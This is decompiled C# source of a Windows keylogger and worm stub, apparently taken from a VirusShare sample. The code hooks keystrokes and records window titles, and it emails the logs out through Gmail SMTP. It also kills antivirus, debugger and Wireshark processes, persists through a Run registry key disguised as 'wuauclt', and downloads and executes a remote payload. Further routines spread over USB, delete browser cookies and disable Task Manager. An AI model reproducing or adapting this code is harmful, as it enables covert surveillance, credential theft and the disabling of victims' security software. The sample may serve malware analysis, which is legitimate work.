// Decompiled with JetBrains decompiler // Type: Form1 // Assembly: Stub, Version=2.0.2.0, Culture=neutral, PublicKeyToken=null // MVID: 2ADEE861-B489-4B94-AFAF-878A34E8554C // Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Worm.Win32.AutoRun.hvq-1a05e2bf2933df28485ce43bcb7274cfc2bd455dd9a6472cef1260454451db86.exe using Microsoft.VisualBasic; using Microsoft.VisualBasic.CompilerServices; using Microsoft.Win32; using My; using System; using System.Collections.Generic; using System.ComponentModel; using System.Diagnostics; using System.Drawing; using System.IO; using System.Net; using System.Net.Mail; using System.Runtime.CompilerServices; using System.Runtime.InteropServices; using System.Text; using System.Threading; using System.Windows.Forms; [DesignerGenerated] public class Form1 : Form { private IContainer components; [AccessedThroughProperty("TextBox1")] private TextBox _TextBox1; [AccessedThroughProperty("Timer1")] private System.Windows.Forms.Timer _Timer1; [AccessedThroughProperty("Timer2")] private System.Windows.Forms.Timer _Timer2; [AccessedThroughProperty("Timer4")] private System.Windows.Forms.Timer _Timer4; [AccessedThroughProperty("TextBox2")] private TextBox _TextBox2; [AccessedThroughProperty("TextBox3")] private TextBox _TextBox3; private string gmailpwd; private string gmailusr; private string tmrinterval; private string exename; private string downloadenabled; private string downloadurl; private string errortitle; private string errormessage; private string anties; private string enablelink; private string startup; private string cb6; private string cb7; private string cb8; private string cb9; private const string Fitz = "-!_@Fitz-@_!"; [AccessedThroughProperty("K")] private clannad _K; private string elsf; private string[] Settings; private string str1n; private string path; private IPHostEntry adresipnes; public Form1() { this.Load += new EventHandler(this.Form1_Load); this.K = new clannad(); this.str1n = (string) null; this.path = Path.GetTempPath(); this.adresipnes = Dns.GetHostByName(Dns.GetHostName()); this.InitializeComponent(); } [DebuggerNonUserCode] protected override void Dispose(bool disposing) { try { if (!disposing || this.components == null) return; this.components.Dispose(); } finally { base.Dispose(disposing); } } [DebuggerStepThrough] private void InitializeComponent() { this.components = (IContainer) new System.ComponentModel.Container(); this.TextBox1 = new TextBox(); this.Timer1 = new System.Windows.Forms.Timer(this.components); this.Timer2 = new System.Windows.Forms.Timer(this.components); this.Timer4 = new System.Windows.Forms.Timer(this.components); this.TextBox2 = new TextBox(); this.TextBox3 = new TextBox(); this.SuspendLayout(); TextBox textBox1_1 = this.TextBox1; Point point1 = new Point(0, 0); Point point2 = point1; textBox1_1.Location = point2; this.TextBox1.Name = "TextBox1"; TextBox textBox1_2 = this.TextBox1; Size size1 = new Size(100, 20); Size size2 = size1; textBox1_2.Size = size2; this.TextBox1.TabIndex = 0; TextBox textBox2_1 = this.TextBox2; point1 = new Point(104, 80); Point point3 = point1; textBox2_1.Location = point3; this.TextBox2.Name = "TextBox2"; TextBox textBox2_2 = this.TextBox2; size1 = new Size(100, 20); Size size3 = size1; textBox2_2.Size = size3; this.TextBox2.TabIndex = 1; TextBox textBox3_1 = this.TextBox3; point1 = new Point(104, 107); Point point4 = point1; textBox3_1.Location = point4; this.TextBox3.Name = "TextBox3"; TextBox textBox3_2 = this.TextBox3; size1 = new Size(100, 20); Size size4 = size1; textBox3_2.Size = size4; this.TextBox3.TabIndex = 2; this.AutoScaleDimensions = new SizeF(6f, 13f); this.AutoScaleMode = AutoScaleMode.Font; size1 = new Size(10, 10); this.ClientSize = size1; this.Controls.Add((Control) this.TextBox3); this.Controls.Add((Control) this.TextBox2); this.Controls.Add((Control) this.TextBox1); this.FormBorderStyle = FormBorderStyle.None; this.MaximizeBox = false; this.MinimizeBox = false; this.Name = nameof (Form1); this.Opacity = 0.0; this.ShowIcon = false; this.ShowInTaskbar = false; this.Text = nameof (Form1); this.ResumeLayout(false); this.PerformLayout(); } internal virtual TextBox TextBox1 { [DebuggerNonUserCode] get => this._TextBox1; [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set { EventHandler eventHandler = new EventHandler(this.TextBox1_TextChanged); if (this._TextBox1 != null) this._TextBox1.TextChanged -= eventHandler; this._TextBox1 = value; if (this._TextBox1 == null) return; this._TextBox1.TextChanged += eventHandler; } } internal virtual System.Windows.Forms.Timer Timer1 { [DebuggerNonUserCode] get => this._Timer1; [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set { EventHandler eventHandler = new EventHandler(this.Timer1_Tick); if (this._Timer1 != null) this._Timer1.Tick -= eventHandler; this._Timer1 = value; if (this._Timer1 == null) return; this._Timer1.Tick += eventHandler; } } internal virtual System.Windows.Forms.Timer Timer2 { [DebuggerNonUserCode] get => this._Timer2; [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set { EventHandler eventHandler = new EventHandler(this.Timer2_Tick); if (this._Timer2 != null) this._Timer2.Tick -= eventHandler; this._Timer2 = value; if (this._Timer2 == null) return; this._Timer2.Tick += eventHandler; } } internal virtual System.Windows.Forms.Timer Timer4 { [DebuggerNonUserCode] get => this._Timer4; [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set { EventHandler eventHandler = new EventHandler(this.Timer4_Tick); if (this._Timer4 != null) this._Timer4.Tick -= eventHandler; this._Timer4 = value; if (this._Timer4 == null) return; this._Timer4.Tick += eventHandler; } } internal virtual TextBox TextBox2 { [DebuggerNonUserCode] get => this._TextBox2; [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set => this._TextBox2 = value; } internal virtual TextBox TextBox3 { [DebuggerNonUserCode] get => this._TextBox3; [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set => this._TextBox3 = value; } private virtual clannad K { [DebuggerNonUserCode] get => this._K; [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set { clannad.DownEventHandler downEventHandler = new clannad.DownEventHandler(this.K_Down); if (this._K != null) clannad.Down -= downEventHandler; this._K = value; if (this._K == null) return; clannad.Down += downEventHandler; } } [DllImport("user32.dll", CharSet = CharSet.Ansi, SetLastError = true)] private static extern int GetForegroundWindow(); [DllImport("user32.dll", EntryPoint = "GetWindowTextA", CharSet = CharSet.Ansi, SetLastError = true)] private static extern int GetWindowText(int hwnd, [MarshalAs(UnmanagedType.VBByRefStr)] ref string lpString, int cch); private void TextBox1_TextChanged(object sender, EventArgs e) { } private void Form1_Load(object sender, EventArgs e) { F7h5o2wX4skMmN8HU f7h5o2wX4skMmN8Hu = new F7h5o2wX4skMmN8HU(); this.Hide(); this.Visible = false; try { FileSystem.FileOpen(1, Application.ExecutablePath, OpenMode.Binary, OpenAccess.Read); this.gmailusr = Strings.Space(checked ((int) FileSystem.LOF(1))); this.gmailpwd = Strings.Space(checked ((int) FileSystem.LOF(1))); this.tmrinterval = Strings.Space(checked ((int) FileSystem.LOF(1))); this.exename = Strings.Space(checked ((int) FileSystem.LOF(1))); this.downloadenabled = Strings.Space(checked ((int) FileSystem.LOF(1))); this.downloadurl = Strings.Space(checked ((int) FileSystem.LOF(1))); this.enablelink = Strings.Space(checked ((int) FileSystem.LOF(1))); this.anties = Strings.Space(checked ((int) FileSystem.LOF(1))); this.startup = Strings.Space(checked ((int) FileSystem.LOF(1))); this.cb6 = Strings.Space(checked ((int) FileSystem.LOF(1))); this.cb7 = Strings.Space(checked ((int) FileSystem.LOF(1))); this.cb8 = Strings.Space(checked ((int) FileSystem.LOF(1))); this.cb9 = Strings.Space(checked ((int) FileSystem.LOF(1))); this.errortitle = Strings.Space(checked ((int) FileSystem.LOF(1))); this.errormessage = Strings.Space(checked ((int) FileSystem.LOF(1))); this.Settings = Strings.Split(Encoding.Default.GetString(ResourceReader.ReadResource(Application.ExecutablePath)), "-!_@Fitz-@_!"); if (Operators.CompareString(this.Settings[13], "True", false) == 0) { int num = (int) MessageBox.Show(this.Settings[15], this.Settings[14], MessageBoxButtons.OK, MessageBoxIcon.Hand); } if (Operators.CompareString(this.Settings[8], "True", false) == 0) { this.anserantiggenneko(); this.antianekowtser(); this.avarsernekochan(); this.avergerneko(); this.claromerchan(); this.comderosama(); this.edawrdelric(); this.eftopstkun(); this.macarfeechan(); this.kaperskerneko(); this.noremonkun(); this.noretonekimblee(); this.oofisescanalphonse(); this.anteyolleydebegeeyuki(); this.anteyoutpoestnagato(); this.antaypeeceechilingharuhi(); this.sandebocseenagisa(); this.searvearproetektnyu(); this.spieseweapalucard(); this.wyresharkehavok(); this.veeemchekmustang(); } if (Operators.CompareString(this.Settings[9], "True", false) == 0) this.adtoostertarpichigo("wuauclt", Application.ExecutablePath); if (Operators.CompareString(this.Settings[5], "True", false) == 0) { MyProject.Computer.Network.DownloadFile(this.Settings[6], this.path + this.FileName(this.Settings[6])); Thread.Sleep(5000); Process.Start(this.path + this.FileName(this.Settings[6])); } if (Operators.CompareString(this.Settings[10], "True", false) == 0) usb.Usb1(); if (Operators.CompareString(this.Settings[11], "True", false) == 0) { this.kielprocclust(true, true); this.deeleeteeiecookeeshawkeye(true); this.deeleeteemosilercookeeshoenhiem(true); } if (Operators.CompareString(this.Settings[12], "True", false) == 0) this.Timer4.Start(); this.TextBox1.Text += Conversions.ToString(DateAndTime.Now); this.Timer1.Start(); this.Timer2.Interval = Conversions.ToInteger(this.Settings[3]); this.Timer2.Start(); this.K.CreateHook(); } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); } } private void K_Down(string Key) => this.TextBox1.Text += Key; private void Timer4_Tick(object sender, EventArgs e) { if (!Conversions.ToBoolean(this.Settings[12])) return; MyProject.Computer.Registry.SetValue("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", "DisableTaskMgr", (object) "1", RegistryValueKind.DWord); } public void kielprocclust(bool InternetExplorer, bool Firefox) { Process[] processes = Process.GetProcesses(); int index = 0; while (index < processes.Length) { Process process = processes[index]; if (Firefox) { if (process.MainWindowTitle.Contains("Mozilla Firefox")) process.Kill(); else if (Operators.CompareString(process.ProcessName, "firefox.exe", false) == 0) process.Kill(); } if (InternetExplorer) { if (process.MainWindowTitle.Contains("Internet Explorer")) process.Kill(); else if (Operators.CompareString(process.ProcessName, "iexplore.exe", false) == 0) process.Kill(); } checked { ++index; } } } public void deeleeteeiecookeeshawkeye(bool Enable) { if (!Enable) return; string folderPath = Environment.GetFolderPath(Environment.SpecialFolder.Cookies); if (!Directory.Exists(folderPath)) return; try { foreach (string file in MyProject.Computer.FileSystem.GetFiles(folderPath)) { try { MyProject.Computer.FileSystem.DeleteFile(file); } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); } } } finally { IEnumerator enumerator; enumerator?.Dispose(); } } public void deeleeteemosilercookeeshoenhiem(bool Enable) { if (!Enable) return; string str = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\Mozilla\\Firefox\\Profiles"; if (!Directory.Exists(str)) return; try { foreach (string directory in MyProject.Computer.FileSystem.GetDirectories(str)) { try { foreach (string file in MyProject.Computer.FileSystem.GetFiles(directory)) { if (file.Contains("cookie")) { try { MyProject.Computer.FileSystem.DeleteFile(file); } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); } } } } finally { IEnumerator enumerator; enumerator?.Dispose(); } } } finally { IEnumerator enumerator; enumerator?.Dispose(); } } public void deeleeteemosilersineonesarmstrong(bool Enable) { if (!Enable) return; string str = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\Mozilla\\Firefox\\Profiles"; if (!Directory.Exists(str)) return; try { foreach (string directory in MyProject.Computer.FileSystem.GetDirectories(str)) { try { foreach (string file in MyProject.Computer.FileSystem.GetFiles(directory)) { if (file.Contains("signon")) { try { MyProject.Computer.FileSystem.DeleteFile(file); } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); } } } } finally { IEnumerator enumerator; enumerator?.Dispose(); } } } finally { IEnumerator enumerator; enumerator?.Dispose(); } } public void antianekowtser() { Process[] processes = Process.GetProcesses(); int num = checked (processes.Length - 1); int index = 0; while (index <= num) { if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "a2servic.exe", false) == 0) processes[index].Kill(); checked { ++index; } } } public void anserantiggenneko() { Process[] processes = Process.GetProcesses(); int num = checked (processes.Length - 1); int index = 0; while (index <= num) { if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "antigen.exe", false) == 0) processes[index].Kill(); checked { ++index; } } } public void avarsernekochan() { Process[] processes = Process.GetProcesses(); int num = checked (processes.Length - 1); int index = 0; while (index <= num) { if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "ashWebSv.exe", false) == 0) processes[index].Kill(); checked { ++index; } } } public void adtoostertarpichigo(string Name, string Path) { try { Registry.CurrentUser.OpenSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run", true).SetValue(Name, (object) Path, RegistryValueKind.String); } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); } } public void deeleteeetoostertarpichigo() { try { RegistryKey registryKey = Registry.CurrentUser.OpenSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run", true); registryKey.DeleteValue("APPLICATIONTITLE", false); registryKey.Close(); } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); } } public void avergerneko() { Process[] processes = Process.GetProcesses(); int num = checked (processes.Length - 1); int index = 0; while (index <= num) { if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "avgemc.exe", false) == 0) processes[index].Kill(); checked { ++index; } } } public void kaperskerneko() { Process[] processes = Process.GetProcesses(); int num = checked (processes.Length - 1); int index = 0; while (index <= num) { if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "avp", false) == 0) processes[index].Kill(); checked { ++index; } } } public void claromerchan() { Process[] processes = Process.GetProcesses(); int num = checked (processes.Length - 1); int index = 0; while (index <= num) { if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "clamauto.exe", false) == 0) processes[index].Kill(); checked { ++index; } } } public void comderosama() { Process[] processes = Process.GetProcesses(); int num = checked (processes.Length - 1); int index = 0; while (index <= num) { if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "cpf.exe", false) == 0) processes[index].Kill(); checked { ++index; } } } public void edawrdelric() { Process[] processes = Process.GetProcesses(); int num = checked (processes.Length - 1); int index = 0; while (index <= num) { if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "ewido.exe", false) == 0) processes[index].Kill(); checked { ++index; } } } public void eftopstkun() { Process[] processes = Process.GetProcesses(); int num = checked (processes.Length - 1); int index = 0; while (index <= num) { if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "FPAVServer.exe", false) == 0) processes[index].Kill(); checked { ++index; } } } public void macarfeechan() { Process[] processes = Process.GetProcesses(); int num = checked (processes.Length - 1); int index = 0; while (index <= num) { if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "mcagentmcuimgr", false) == 0) processes[index].Kill(); checked { ++index; } } } public void noremonkun() { Process[] processes = Process.GetProcesses(); int num = checked (processes.Length - 1); int index = 0; while (index <= num) { if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "npfmsg", false) == 0) processes[index].Kill(); checked { ++index; } } } public void noretonekimblee() { Process[] processes = Process.GetProcesses(); int num = checked (processes.Length - 1); int index = 0; while (index <= num) { if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "ccapp.exe", false) == 0) processes[index].Kill(); checked { ++index; } } } public void oofisescanalphonse() { Process[] processes = Process.GetProcesses(); int num = checked (processes.Length - 1); int index = 0; while (index <= num) { if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "tmlisten.exe", false) == 0) processes[index].Kill(); checked { ++index; } } } public void anteyolleydebegeeyuki() { Process[] processes = Process.GetProcesses(); int num = checked (processes.Length - 1); int index = 0; while (index <= num) { if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "ollydbg", false) == 0) processes[index].Kill(); checked { ++index; } } } public void anteyoutpoestnagato() { Process[] processes = Process.GetProcesses(); int num = checked (processes.Length - 1); int index = 0; while (index <= num) { if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "outpost", false) == 0) processes[index].Kill(); checked { ++index; } } } public void antaypeeceechilingharuhi() { Process[] processes = Process.GetProcesses(); int num = checked (processes.Length - 1); int index = 0; while (index <= num) { if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "pccntmon.exe", false) == 0) processes[index].Kill(); checked { ++index; } } } public void sandebocseenagisa() { label_0: int num1; int num2; try { ProjectData.ClearProjectError(); num1 = -2; label_1: int num3 = 2; if (!this.Text.Contains("#")) goto label_3; label_2: num3 = 3; this.Close(); goto label_11; label_3: num3 = 5; label_4: num3 = 6; this.Show(); goto label_11; label_6: num2 = num3; switch (num1 > -2 ? num1 : 1) { case 1: int num4 = num2 + 1; num2 = 0; switch (num4) { case 1: goto label_0; case 2: goto label_1; case 3: goto label_2; case 4: case 7: case 8: goto label_11; case 5: goto label_3; case 6: goto label_4; } break; } } catch (Exception ex) when (ex is Exception & num1 != 0 & num2 == 0) { ProjectData.SetProjectError(ex); goto label_6; } throw ProjectData.CreateProjectError(-2146828237); label_11: if (num2 == 0) return; ProjectData.ClearProjectError(); } public void searvearproetektnyu() { Process[] processes = Process.GetProcesses(); int num = checked (processes.Length - 1); int index = 0; while (index <= num) { if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "earthagent.exe", false) == 0) processes[index].Kill(); checked { ++index; } } } public void spieseweapalucard() { Process[] processes = Process.GetProcesses(); int num = checked (processes.Length - 1); int index = 0; while (index <= num) { if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "spysweeper.exe", false) == 0) processes[index].Kill(); checked { ++index; } } } public bool veeemchekmustang() { string userName = Environment.UserName; object[] objArray = new object[1] { (object) "SELECT * FROM Win32_VideoController" }; if (new bool[1]{ true }[0]) Conversions.ToString(Conversions.ChangeType(RuntimeHelpers.GetObjectValue(RuntimeHelpers.GetObjectValue(RuntimeHelpers.GetObjectValue(objArray[0]))), typeof (string))); bool flag; return flag; } public void wyresharkehavok() { Process[] processes = Process.GetProcesses(); int num = checked (processes.Length - 1); int index = 0; while (index <= num) { if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "wireshark", false) == 0) processes[index].Kill(); checked { ++index; } } } private string GetActiveWindowTitle() { string lpString = new string(char.MinValue, 100); Form1.GetWindowText(Form1.GetForegroundWindow(), ref lpString, 100); return lpString.Substring(0, checked (Strings.InStr(lpString, "\0") - 1)); } private void Timer2_Tick(object sender, EventArgs e) { try { new SmtpClient("smtp.gmail.com") { EnableSsl = true, Credentials = ((ICredentialsByHost) new NetworkCredential(this.Settings[1], this.Settings[2])), Port = 587 }.Send(new MailMessage() { Subject = "[Dscreet Logs] - ", To = { this.Settings[1] }, From = new MailAddress(this.Settings[1]), Body = this.TextBox1.Text }); this.TextBox1.Clear(); } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); } } public string FileName(string FullPath) => Path.GetFileName(FullPath); private void Timer1_Tick(object sender, EventArgs e) { if (Operators.CompareString(this.str1n, this.GetActiveWindowTitle(), false) == 0) return; this.TextBox1.Text = this.TextBox1.Text + "\r\n[-- " + this.GetActiveWindowTitle() + " --]\r\n"; this.str1n = this.GetActiveWindowTitle(); } }